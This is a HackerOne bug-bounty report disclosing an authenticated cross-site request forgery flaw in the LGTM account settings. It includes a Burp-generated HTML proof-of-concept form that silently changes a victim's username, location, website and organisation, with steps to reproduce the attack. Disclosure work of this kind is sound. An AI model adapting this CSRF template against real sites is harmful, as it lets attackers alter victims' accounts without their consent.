Semmle: Authenticated Cross-Site-Request-Forgery

ID H1:505595
Type hackerone
Reporter drspitfire
Modified 2019-03-19T13:13:44


Summary: I have read the T&C to be eligible for bounty on this program. As per T&C authenticated CSRF requests are eligible for a bounty. I am not looking for the Bounty, However I want to give you an update on Authenticated CSRF that I have found. In the "Account Settings", a user can change his username, Location, Website and Company name. This information can be changed by an adversary using CSRF attack. Please follow given below steps.

Steps To Reproduce: Step1: Copy and Paste below code and save it as an HTML file.

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="" method="POST"> <input type="hidden" name="name" value="Wasim Shaikh" /> <input type="hidden" name="username" value="spitfirehunt" /> <input type="hidden" name="location" value="Jeddah" /> <input type="hidden" name="website" value="" /> <input type="hidden" name="organization" value="Blogspot" /> <input type="hidden" name="nonce" value="5c04dc5f1a3327b091ecff05604bca8d22233583d0a632a01b16de290efe38b6a4fd5117fcb1d33534356da3c3242de2c236df52cb8a222c6e772c46fc64c2a2" /> <input type="hidden" name="apiVersion" value="6526f3837c6050e2cc7ab97e8abf9cd01f4c7002" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Step2: Login using your legitimate account @LGTM-

Step3: Open HTML file using same browser where you have an active session for LGTM.

Step4: Click on "Submit" button and your information in personal profile will be changed.

Kindly let me know if you are able to reproduce the issue or not.


Security Impact:

1: Changing the username of a user on his behalf. 2: Adding a malicious website's link to a user's account. 3: User might visit malicious websites considering it is there on his account to check it and thus, end up downloading malicious software on his machine, phishing attacks or much more.